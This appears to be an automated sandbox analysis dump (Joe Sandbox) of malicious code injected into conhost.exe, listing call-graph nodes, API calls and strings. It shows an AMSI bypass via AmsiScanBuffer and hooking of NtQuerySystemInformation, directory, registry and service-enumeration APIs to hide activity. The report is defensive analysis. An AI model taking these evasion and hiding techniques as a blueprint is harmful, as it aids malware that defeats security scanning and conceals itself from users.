8078->8077 8079 166be493523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8078->8079 8080 166be493555 StrCmpW 8079->8080 8081 166be49358d GetProcessHeap HeapFree 8079->8081 8080->8081 8083 166be49356a 8080->8083 8081->8077 8083->8081 8084 166be493950 StrCmpNW 8083->8084 8085 166be4939f2 8084->8085 8086 166be493982 StrStrW 8084->8086 8085->8083 8086->8085 8087 166be49399b StrToIntW 8086->8087 8087->8085 8088 166be4939c3 8087->8088 8088->8085 8094 166be491a30 OpenProcess 8088->8094 8091 166be493f88 StrCmpNIW 8092 166be4939e4 8091->8092 8092->8085 8093 166be491cfc 2 API calls 8092->8093 8093->8085 8095 166be491a64 K32GetModuleFileNameExW 8094->8095 8096 166be491ab6 8094->8096 8097 166be491a7e PathFindFileNameW lstrlenW 8095->8097 8098 166be491aad CloseHandle 8095->8098 8096->8085 8096->8091 8097->8098 8099 166be491a9c StrCpyW 8097->8099 8098->8096 8099->8098 7559 166be491e3c LoadLibraryA GetProcAddress 7560 166be491e6f 7559->7560 7561 166be491e62 SleepEx 7559->7561 7561->7561 8857 166be4a19d0 8858 166be49e864 56 API calls 8857->8858 8859 166be4a19d9 8858->8859 8528 166be4a494f 8529 166be4a495e 8528->8529 8530 166be4a4968 8528->8530 8532 166be49c5ac LeaveCriticalSection 8529->8532 8103 166be49b0d4 8110 166be49b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8103->8110 8104 166be49b0fb 8105 166be499324 _CreateFrameInfo 9 API calls 8104->8105 8106 166be49b100 8105->8106 8107 166be499324 _CreateFrameInfo 9 API calls 8106->8107 8108 166be49b10b __FrameHandler3::GetHandlerSearchState 8106->8108 8107->8108 8109 166be4999cc 9 API calls Is_bad_exception_allowed 8109->8110 8110->8104 8110->8108 8110->8109 8111 166be4999f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8110->8111 8111->8110 9069 166be492e54 9071 166be492ea8 9069->9071 9070 166be492ec3 9071->9070 9073 166be4937f4 9071->9073 9074 166be49388a 9073->9074 9077 166be493819 9073->9077 9074->9070 9075 166be493f88 StrCmpNIW 9075->9077 9076 166be491e08 StrCmpIW StrCmpW 9076->9077 9077->9074 9077->9075 9077->9076 9078 166be4a4848 9081 166be49904c 9078->9081 9082 166be499064 9081->9082 9083 166be499076 9081->9083 9082->9083 9085 166be49906c 9082->9085 9084 166be499324 _CreateFrameInfo 9 API calls 9083->9084 9086 166be49907b 9084->9086 9087 166be499074 9085->9087 9088 166be499324 _CreateFrameInfo 9 API calls 9085->9088 9086->9087 9089 166be499324 _CreateFrameInfo 9 API calls 9086->9089 9090 166be49909b 9088->9090 9089->9087 9091 166be499324 _CreateFrameInfo 9 API calls 9090->9091 9092 166be4990a8 9091->9092 9093 166be49c2f4 14 API calls 9092->9093 9094 166be4990b1 9093->9094 9095 166be49c2f4 14 API calls 9094->9095 9096 166be4990bd 9095->9096 8533 166be49ad48 8534 166be499324 _CreateFrameInfo 9 API calls 8533->8534 8535 166be49ad7d 8534->8535 8536 166be499324 _CreateFrameInfo 9 API calls 8535->8536 8537 166be49ad8b __except_validate_context_record 8536->8537 8538 166be499324 _CreateFrameInfo 9 API calls 8537->8538 8539 166be49adcf 8538->8539 8540 166be499324 _CreateFrameInfo 9 API calls 8539->8540 8541 166be49add8 8540->8541 8542 166be499324 _CreateFrameInfo 9 API calls 8541->8542 8543 166be49ade1 8542->8543 8556 166be49993c 8543->8556 8546 166be499324 _CreateFrameInfo 9 API calls 8547 166be49ae11 __CxxCallCatchBlock 8546->8547 8563 166be499978 8547->8563 8549 166be49aeeb __CxxCallCatchBlock 8550 166be499324 _CreateFrameInfo 9 API calls 8549->8550 8552 166be49aefe 8550->8552 8553 166be499324 _CreateFrameInfo 9 API calls 8552->8553 8555 166be49af07 8553->8555 8557 166be499324 _CreateFrameInfo 9 API calls 8556->8557 8558 166be49994d 8557->8558 8559 166be499958 8558->8559 8560 166be499324 _CreateFrameInfo 9 API calls 8558->8560 8561 166be499324 _CreateFrameInfo 9 API calls 8559->8561 8560->8559 8562 166be499969 8561->8562 8562->8546 8562->8547 8564 166be499324 _CreateFrameInfo 9 API calls 8563->8564 8565 166be49998a 8564->8565 8566 166be4999c5 8565->8566 8567 166be499324 _CreateFrameInfo 9 API calls 8565->8567 8568 166be499995 8567->8568 8568->8566 8569 166be499324 _CreateFrameInfo 9 API calls 8568->8569 8570 166be4999b6 8569->8570 8570->8549 8571 166be498ff8 8570->8571 8572 166be499324 _CreateFrameInfo 9 API calls 8571->8572 8573 166be499006 8572->8573 8573->8549 8860 166be495fcc 8863 166be495fd3 8860->8863 8861 166be496000 VirtualProtect 8862 166be496029 GetLastError 8861->8862 8864 166be495f10 8861->8864 8862->8864 8863->8861 8863->8864 9097 166be49824c 9099 166be498270 __scrt_release_startup_lock 9097->9099 9098 166be49b581 9099->9098 9100 166be49cb10 __std_exception_copy 13 API calls 9099->9100 9101 166be49b5aa 9100->9101 8112 166be4a06e0 8113 166be4a06f9 8112->8113 8114 166be4a06e9 8112->8114 8115 166be49d1f4 __std_exception_copy 13 API calls 8114->8115 8116 166be4a06ee 8115->8116 8117 166be49d04c _invalid_parameter_noinfo 38 API calls 8116->8117 8117->8113 8574 166be4a3960 8584 166be498ca0 8574->8584 8576 166be4a3988 8578 166be499324 _CreateFrameInfo 9 API calls 8579 166be4a3998 8578->8579 8580 166be499324 _CreateFrameInfo 9 API calls 8579->8580 8581 166be4a39a1 8580->8581 8582 166be49c2f4 14 API calls 8581->8582 8583 166be4a39aa 8582->8583 8585 166be498cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8584->8585 8586 166be498dd1 8585->8586 8587 166be498d94 RtlUnwindEx 8585->8587 8586->8576 8586->8578 8587->8585 9102 166be4a485e 9103 166be499324 _CreateFrameInfo 9 API calls 9102->9103 9104 166be4a486c 9103->9104 9105 166be4a4877 9104->9105 9106 166be499324 _CreateFrameInfo 9 API calls 9104->9106 9106->9105 8588 166be497f60 8589 166be497f81 8588->8589 8590 166be497f7c 8588->8590 8592 166be498090 8590->8592 8593 166be4980b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8592->8593 8594 166be498127 8592->8594 8593->8594 8594->8589 9107 166be4a465f 9108 166be4a4677 9107->9108 9114 166be4a46e2 9107->9114 9109 166be499324 _CreateFrameInfo 9 API calls 9108->9109 9108->9114 9110 166be4a46c4 9109->9110 9111 166be499324 _CreateFrameInfo 9 API calls 9110->9111 9112 166be4a46d9 9111->9112 9113 166be49c2f4 14 API calls 9112->9113 9113->9114 8865 166be4963e3 8866 166be4963f0 8865->8866 8867 166be4963fc GetThreadContext 8866->8867 8871 166be49655a 8866->8871 8868 166be496422 8867->8868 8867->8871 8868->8871 8876 166be496449 8868->8876 8869 166be49663e 8872 166be49665e 8869->8872 8883 166be494b20 8869->8883 8870 166be496581 VirtualProtect FlushInstructionCache 8870->8871 8871->8869 8871->8870 8887 166be495530 GetCurrentProcess 8872->8887 8875 166be4964cd 8876->8875 8877 166be4964a6 SetThreadContext 8876->8877 8877->8875 8878 166be4966b7 8881 166be498070 _invalid_parameter_noinfo 8 API calls 8878->8881 8879 166be496677 ResumeThread 8880 166be496663 8879->8880 8880->8878 8880->8879 8882 166be4966ff 8881->8882 8885 166be494b3c 8883->8885 8884 166be494b9f 8884->8872 8885->8884 8886 166be494b52 VirtualFree 8885->8886 8886->8885 8888 166be49554c 8887->8888 8889 166be495593 8888->8889 8890 166be495562 VirtualProtect FlushInstructionCache 8888->8890 8889->8880 8890->8888 8891 166be49f3e4 8892 166be49f41d 8891->8892 8894 166be49f3ee 8891->8894 8893 166be49f403 FreeLibrary 8893->8894 8894->8892 8894->8893 8895 166be4a33e4 8896 166be4a33f5 CloseHandle 8895->8896 8897 166be4a33fb 8895->8897 8896->8897 8595 166be492f64 8597 166be492fc1 8595->8597 8596 166be492fdc 8597->8596 8598 166be4938a8 3 API calls 8597->8598 8598->8596 9115 166be49d658 9116 166be49d67d 9115->9116 9121 166be49d694 9115->9121 9117 166be49d1f4 __std_exception_copy 13 API calls 9116->9117 9119 166be49d682 9117->9119 9118 166be49d724 9122 166be49bb54 13 API calls 9118->9122 9120 166be49d04c _invalid_parameter_noinfo 38 API calls 9119->9120 9137 166be49d68d 9120->9137 9121->9118 9139 166be49d7b6 9121->9139 9141 166be49d6da 9121->9141 9148 166be49d894 9121->9148 9210 166be49da18 9121->9210 9123 166be49d77c 9122->9123 9125 166be49d784 9123->9125 9144 166be49d7d7 9123->9144 9128 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9125->9128 9127 166be49d836 9129 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9127->9129 9136 166be49d78b 9128->9136 9131 166be49d841 9129->9131 9130 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9130->9137 9132 166be49d85a 9131->9132 9138 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9131->9138 9140 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9132->9140 9133 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9133->9139 9134 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9134->9141 9135 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9135->9136 9136->9135 9143 166be49d6fd 9136->9143 9138->9131 9139->9133 9139->9143 9140->9137 9141->9134 9141->9143 9143->9130 9144->9127 9145 166be49d87c 9144->9145 9247 166be4a0eb8 9144->9247 9146 166be49d06c _invalid_parameter_noinfo 17 API calls 9145->9146 9147 166be49d891 9146->9147 9149 166be49d8c2 9148->9149 9149->9149 9150 166be49d8de 9149->9150 9151 166be49d220 _invalid_parameter_noinfo 13 API calls 9149->9151 9150->9121 9152 166be49d90d 9151->9152 9153 166be49d926 9152->9153 9154 166be4a0eb8 38 API calls 9152->9154 9155 166be4a0eb8 38 API calls 9153->9155 9165 166be49d9fc 9153->9165 9154->9153 9156 166be49d943 9155->9156 9158 166be49d97f 9156->9158 9159 166be49d962 9156->9159 9160 166be49d98d 9156->9160 9156->9165 9157 166be49d06c _invalid_parameter_noinfo 17 API calls 9171 166be49da17 9157->9171 9161 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9158->9161 9163 166be49d220 _invalid_parameter_noinfo 13 API calls 9159->9163 9162 166be49d977 9160->9162 9256 166be49eee0 9160->9256 9161->9165 9162->9158 9168 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9162->9168 9164 166be49d96d 9163->9164 9169 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9164->9169 9165->9157 9167 166be49da7a 9175 166be49da8c 9167->9175 9180 166be49daa1 9167->9180 9168->9158 9169->9162 9170 166be49d9b5 9172 166be49d9d0 9170->9172 9173 166be49d9ba 9170->9173 9171->9167 9265 166be4a13d8 9171->9265 9178 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9172->9178 9177 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9173->9177 9176 166be49d894 52 API calls 9175->9176 9179 166be49da9c 9176->9179 9177->9162 9178->9158 9181 166be498070 _invalid_parameter_noinfo 8 API calls 9179->9181 9182 166be49dd78 14 API calls 9180->9182 9183 166be49dd64 9181->9183 9184 166be49db0b 9182->9184 9183->9121 9185 166be49db1a 9184->9185 9186 166be49f198 9 API calls 9184->9186 9274 166be49d30c 9185->9274 9186->9185 9189 166be49dba8 9190 166be49d894 52 API calls 9189->9190 9191 166be49dbb8 9190->9191 9191->9179 9193 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9191->9193 9192 166be49dd78 14 API calls 9202 166be49dbd2 9192->9202 9193->9179 9194 166be49f198 9 API calls 9194->9202 9196 166be49d894 52 API calls 9196->9202 9197 166be49dcc8 FindNextFileW 9199 166be49dce0 9197->9199 9197->9202 9198 166be49dd2a 9201 166be49dd38 FindClose 9198->9201 9204 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9198->9204 9203 166be49dd0c FindClose 9199->9203 9318 166be4a0b20 9199->9318 9200 166be49d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 9200->9202 9201->9179 9205 166be49dd48 9201->9205 9202->9192 9202->9194 9202->9196 9202->9197 9202->9198 9202->9200 9296 166be49d4ac 9202->9296 9203->9179 9207 166be49dd1c 9203->9207 9204->9201 9208 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9205->9208 9209 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9207->9209 9208->9179 9209->9179 9211 166be49da58 9210->9211 9212 166be49da7a 9210->9212 9211->9212 9214 166be4a13d8 38 API calls 9211->9214 9213 166be49daa1 9212->9213 9215 166be49da8c 9212->9215 9218 166be49dd78 14 API calls 9213->9218 9214->9211 9216 166be49d894 56 API calls 9215->9216 9229 166be49da9c 9216->9229 9217 166be498070 _invalid_parameter_noinfo 8 API calls 9219 166be49dd64 9217->9219 9220 166be49db0b 9218->9220 9219->9121 9221 166be49db1a 9220->9221 9222 166be49f198 9 API calls 9220->9222 9223 166be49d30c 16 API calls 9221->9223 9222->9221 9224 166be49db7b FindFirstFileExW 9223->9224 9225 166be49dba8 9224->9225 9238 166be49dbd2 9224->9238 9226 166be49d894 56 API calls 9225->9226 9227 166be49dbb8 9226->9227 9227->9229 9230 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9227->9230 9228 166be49dd78 14 API calls 9228->9238 9229->9217 9230->9229 9231 166be49f198 9 API calls 9231->9238 9232 166be49d4ac 16 API calls 9232->9238 9233 166be49d894 56 API calls 9233->9238 9234 166be49dcc8 FindNextFileW 9236 166be49dce0 9234->9236 9234->9238 9235 166be49dd2a 9237 166be49dd38 FindClose 9235->9237 9240 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9235->9240 9239 166be49dd0c FindClose 9236->9239 9243 166be4a0b20 38 API calls 9236->9243 9237->9229 9241 166be49dd48 9237->9241 9238->9228 9238->9231 9238->9232 9238->9233 9238->9234 9238->9235 9242 166be49d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 9238->9242 9239->9229 9244 166be49dd1c 9239->9244 9240->9237 9245 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9241->9245 9242->9238 9243->9239 9246 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9244->9246 9245->9229 9246->9229 9250 166be4a0ed5 9247->9250 9248 166be4a0eda 9249 166be49d1f4 __std_exception_copy 13 API calls 9248->9249 9252 166be4a0ef0 9248->9252 9255 166be4a0ee4 9249->9255 9250->9248 9250->9252 9253 166be4a0f24 9250->9253 9251 166be49d04c _invalid_parameter_noinfo 38 API calls 9251->9252 9252->9144 9253->9252 9254 166be49d1f4 __std_exception_copy 13 API calls 9253->9254 9254->9255 9255->9251 9257 166be49ef1f 9256->9257 9258 166be49ef02 9256->9258 9259 166be49ef29 9257->9259 9326 166be4a19f0 9257->9326 9258->9257 9260 166be49ef10 9258->9260 9333 166be4a1a40 9259->9333 9262 166be49d1f4 __std_exception_copy 13 API calls 9260->9262 9264 166be49ef15 9262->9264 9264->9170 9266 166be4a13e0 9265->9266 9267 166be4a13f5 9266->9267 9269 166be4a140e 9266->9269 9268 166be49d1f4 __std_exception_copy 13 API calls 9267->9268 9270 166be4a13fa 9268->9270 9271 166be49dd78 14 API calls 9269->9271 9273 166be4a1405 9269->9273 9272 166be49d04c _invalid_parameter_noinfo 38 API calls 9270->9272 9271->9273 9272->9273 9273->9171 9275 166be49d336 9274->9275 9276 166be49d35a 9274->9276 9280 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9275->9280 9283 166be49d345 FindFirstFileExW 9275->9283 9277 166be49d3bf 9276->9277 9278 166be49d35f 9276->9278 9279 166be49ec58 MultiByteToWideChar 9277->9279 9281 166be49d374 9278->9281 9278->9283 9284 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9278->9284 9291 166be49d3db 9279->9291 9280->9283 9285 166be49c5d0 14 API calls 9281->9285 9282 166be49d3e2 GetLastError 9286 166be49d184 13 API calls 9282->9286 9283->9189 9283->9202 9284->9281 9285->9283 9289 166be49d3ef 9286->9289 9287 166be49d420 9287->9283 9288 166be49ec58 MultiByteToWideChar 9287->9288 9292 166be49d47a 9288->9292 9293 166be49d1f4 __std_exception_copy 13 API calls 9289->9293 9290 166be49d413 9295 166be49c5d0 14 API calls 9290->9295 9291->9282 9291->9287 9291->9290 9294 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9291->9294 9292->9282 9292->9283 9293->9283 9294->9290 9295->9287 9297 166be49d4d6 9296->9297 9298 166be49d4fa 9296->9298 9301 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9297->9301 9303 166be49d4e5 9297->9303 9299 166be49d500 9298->9299 9300 166be49d55f 9298->9300 9299->9303 9306 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9299->9306 9310 166be49d515 9299->9310 9302 166be49ece8 WideCharToMultiByte 9300->9302 9301->9303 9309 166be49d583 9302->9309 9303->9202 9304 166be49c5d0 14 API calls 9304->9303 9305 166be49d58a GetLastError 9307 166be49d184 13 API calls 9305->9307 9306->9310 9312 166be49d597 9307->9312 9308 166be49d5c7 9308->9303 9311 166be49ece8 WideCharToMultiByte 9308->9311 9309->9305 9309->9308 9313 166be49d5bb 9309->9313 9317 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9309->9317 9310->9304 9315 166be49d629 9311->9315 9316 166be49d1f4 __std_exception_copy 13 API calls 9312->9316 9314 166be49c5d0 14 API calls 9313->9314 9314->9308 9315->9303 9315->9305 9316->9303 9317->9313 9319 166be4a0b52 9318->9319 9320 166be49d1f4 __std_exception_copy 13 API calls 9319->9320 9325 166be4a0b67 9319->9325 9321 166be4a0b5c 9320->9321 9322 166be49d04c _invalid_parameter_noinfo 38 API calls 9321->9322 9322->9325 9323 166be498070 _invalid_parameter_noinfo 8 API calls 9324 166be4a0ea8 9323->9324 9324->9203 9325->9323 9327 166be4a1a12 HeapSize 9326->9327 9328 166be4a19f9 9326->9328 9329 166be49d1f4 __std_exception_copy 13 API calls 9328->9329 9330 166be4a19fe 9329->9330 9331 166be49d04c _invalid_parameter_noinfo 38 API calls 9330->9331 9332 166be4a1a09 9331->9332 9332->9259 9334 166be4a1a5f 9333->9334 9335 166be4a1a55 9333->9335 9337 166be4a1a64 9334->9337 9343 166be4a1a6b _invalid_parameter_noinfo 9334->9343 9336 166be49c5d0 14 API calls 9335->9336 9341 166be4a1a5d 9336->9341 9338 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9337->9338 9338->9341 9339 166be4a1a71 9342 166be49d1f4 __std_exception_copy 13 API calls 9339->9342 9340 166be4a1a9e HeapReAlloc 9340->9341 9340->9343 9341->9264 9342->9341 9343->9339 9343->9340 9344 166be49b470 _invalid_parameter_noinfo 2 API calls 9343->9344 9344->9343 8898 166be49c1d8 8899 166be49c1f1 8898->8899 8900 166be49c209 8898->8900 8899->8900 8901 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8899->8901 8901->8900 8127 166be49f6dc 8128 166be49f6e8 8127->8128 8130 166be49f70f 8128->8130 8131 166be4a1c0c 8128->8131 8132 166be4a1c11 8131->8132 8136 166be4a1c4c 8131->8136 8133 166be4a1c44 8132->8133 8134 166be4a1c32 DeleteCriticalSection 8132->8134 8135 166be49d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8133->8135 8134->8133 8134->8134 8135->8136 8136->8128 8902 166be4925dc 8904 166be49265a 8902->8904 8903 166be492777 8904->8903 8905 166be4926bf GetFileType 8904->8905 8906 166be4926e1 8905->8906 8907 166be4926cd StrCpyW 8905->8907 8908 166be491ad4 4 API calls 8906->8908 8911 166be4926ee 8907->8911 8908->8911 8909 166be493f88 StrCmpNIW 8909->8911 8910 166be493708 4 API calls 8910->8911 8911->8903 8911->8909 8911->8910 8912 166be491dd4 2 API calls 8911->8912 8912->8911

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                          • API String ID: 1735320900-4225371247
                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction ID: d646218bd1a16b40507b9baa34c0bfef1b35b52de7166ef3c36d8ca0c6cbbaf3
                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction Fuzzy Hash: 3D51BF78B50A5AE9FB40EF64FE407D93321FB453E4F8425239409E2676DE3E824AC384

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProcSleep
                          • String ID: AmsiScanBuffer$amsi.dll
                          • API String ID: 188063004-3248079830
                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction ID: 6823a5c06b28b7e313a038231c85514f864161f9d188bc1741a55ab507bb9217
                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction Fuzzy Hash: A2D09E34B95600E5FE586B11EE543E53262BF64BD1FC52435C50EC13B4DE3E85598740

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 00000166BE493A35
                          • PathFindFileNameW.SHLWAPI ref: 00000166BE493A44
                            • Part of subcall function 00000166BE493F88: StrCmpNIW.SHLWAPI(?,?,?,00000166BE49272F), ref: 00000166BE493FA0
                            • Part of subcall function 00000166BE493EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493EDB
                            • Part of subcall function 00000166BE493EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F0E
                            • Part of subcall function 00000166BE493EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F2E
                            • Part of subcall function 00000166BE493EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F47
                            • Part of subcall function 00000166BE493EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000166BE493A5B), ref: 00000166BE493F68
                          • CreateThread.KERNELBASE ref: 00000166BE493A8B
                            • Part of subcall function 00000166BE491E74: GetCurrentThread.KERNEL32 ref: 00000166BE491E7F
                            • Part of subcall function 00000166BE491E74: CreateThread.KERNELBASE ref: 00000166BE492043
                            • Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492049
                            • Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492055
                            • Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492061
                            • Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE49206D
                            • Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492079
                            • Part of subcall function 00000166BE491E74: TlsAlloc.KERNEL32 ref: 00000166BE492085
                          Memory Dump Source
                          • Source File: 00000016.00000002.2581110277.00000166BE491000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000166BE490000, based on PE: true
                          • Associated: 00000016.00000002.2580222589.00000166BE490000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2582208948.00000166BE4A5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583072375.00000166BE4B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2583895725.00000166BE4B2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000016.00000002.2584733664.00000166BE4B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_166be490000_conhost.jbxd
                          Similarity
                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                          • String ID:
                          • API String ID: 2779030803-0
                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                          • Instruction ID: 4c2b9fa9bb22a0279d3308a789aa57fc4105a4e4d1bc70ec457c81cb6e9be719
                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                          • Instruction Fuzzy Hash: 5411843DB10701DAFB60A770EF497ED22A1ABD63D7F5041299406E5AD2EF7FC4448600
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000003.1886349302.00000166BBF70000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000166BBF70000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_3_166bbf70000_conhost.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                          • Instruction ID: bdcba82c18422573c66358a66c05c8d7857a041859baa63c20aa6a35a44999af
                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                          • Instruction Fuzzy Hash: 9C91277AB11151D7EB748F2AD800BADB399FB84B98F548124DE4987788DF76D813C700

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00000166BE491724: GetProcessHeap.KERNEL32 ref: 00000166BE49172F
                            • Part of subcall function 00000166BE491724: HeapAlloc.KERNEL32 ref: 00000166BE49173E
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE4917AE
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE4917DB
                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE4917F5
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE491815
                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE491830
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE491850
                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE49186B
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE49188B
                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE4918A6
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE4918C6
                          • SleepEx.KERNELBASE ref: 00000166BE491BDF
                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE4918E1
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE491901
                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE49191C
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE49193C
                            • Part of subcall function 00000166BE491724: RegCloseKey.ADVAPI32 ref: 00000166BE491957
                            • Part of subcall function 00000166BE491724: RegOpenKeyExW.ADVAPI32 ref: 00000166BE491977
